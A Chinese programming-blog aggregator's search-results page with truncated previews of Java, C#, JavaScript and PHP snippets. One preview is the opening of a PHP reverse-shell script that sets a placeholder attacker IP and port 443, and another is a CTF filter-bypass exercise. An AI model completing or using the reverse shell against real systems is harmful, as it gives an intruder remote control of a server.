码迷,mamicode.com
首页 >  
搜索关键字:map list set    ( 127567个结果
Http Post Json参数及Json接收
private string HttpRequest(Dictionary<string, object> dic, string url) { string json = JSONhelper.ObjToJson(dic); WebRequest request = WebRequest.Crea ...
分类:Web程序   时间:2021-07-07 17:56:22    阅读次数:0
常用工具类——跨域配置类
@Configuration public class CorsConfig implements WebMvcConfigurer { @Override public void addCorsMappings(CorsRegistry registry) { registry.addMappin ...
分类:其他好文   时间:2021-07-07 17:54:53    阅读次数:0
二维数组的遍历使用foreach
二维数组的遍历使用foreach public int numWays(int n, int[][] relation, int k) { ways = 0; this.n = n; this.k = k; edges = new ArrayList<>(); //把关系处理成list,类似于图的每 ...
分类:编程语言   时间:2021-07-07 17:49:25    阅读次数:0
文件上传
@PostMapping("uploads") public String posts(@RequestParam("file") List<MultipartFile> files){//参数file以list数组接收 if (files.isEmpty()) { return "上传失败,请选择 ...
分类:Web程序   时间:2021-07-06 16:22:43    阅读次数:0
高级属性的定义
普通属性直接赋值,高级属性可以根据你的业务需要进行赋值, /* 定义高级属性 */ const user = { _age: 0 } //这种方式定义的age无法存储数,只是对某个变量成员的代理,加入get和set的目是让你的属性具有 //了行为,也就是我们可以再访问或者是设置属性的时候,添加更多的 ...
分类:其他好文   时间:2021-07-05 19:07:14    阅读次数:0
利用reduce实现数组分类
const list = [ { type: 'shop', momey: 223 }, { type: 'study', momey: 341 }, { type: 'shop', momey: 821 }, { type: 'transfer', momey: 821 }, { type: 's ...
分类:编程语言   时间:2021-07-05 19:06:57    阅读次数:0
php_bugs学习 02 绕过过滤的空白字符
<?php $info = ""; $req = []; $flag="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; ini_set("display_error", false); //为一个配置选项设置值 error_reporting(0); //关闭所有PHP错 ...
分类:Web程序   时间:2021-07-05 19:06:03    阅读次数:0
PHP反弹脚本 Linux/Windows两用
<?php error_reporting (E_ERROR); ignore_user_abort(true); ini_set('max_execution_time',0); $ipaddr = 'xxx.xxx.xxx.xxx'; $port = '443'; $msg = php_unam ...
分类:Windows程序   时间:2021-07-05 19:00:38    阅读次数:0
排序比较器的方法
使用lambda表达式 Collections.sort(List, (a,b) -> x1 - x2); 自定义Comparator方法 Collections.sort(List, new Comparator<E>(){ public int compare(int a, int b){ re ...
分类:编程语言   时间:2021-07-05 18:56:31    阅读次数:0
JavaWeb17.3【EL&JSTL:JSTL标签】
1 <%@ page import="java.util.List" %> 2 <%@ page import="java.util.ArrayList" %><%-- 3 Created by IntelliJ IDEA. 4 User: yubaby 5 Date: 2021/7/3 6 Tim ...
分类:编程语言   时间:2021-07-05 18:54:36    阅读次数:0
127567条   上一页 1 2 3 4 5 6 ... 12757 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!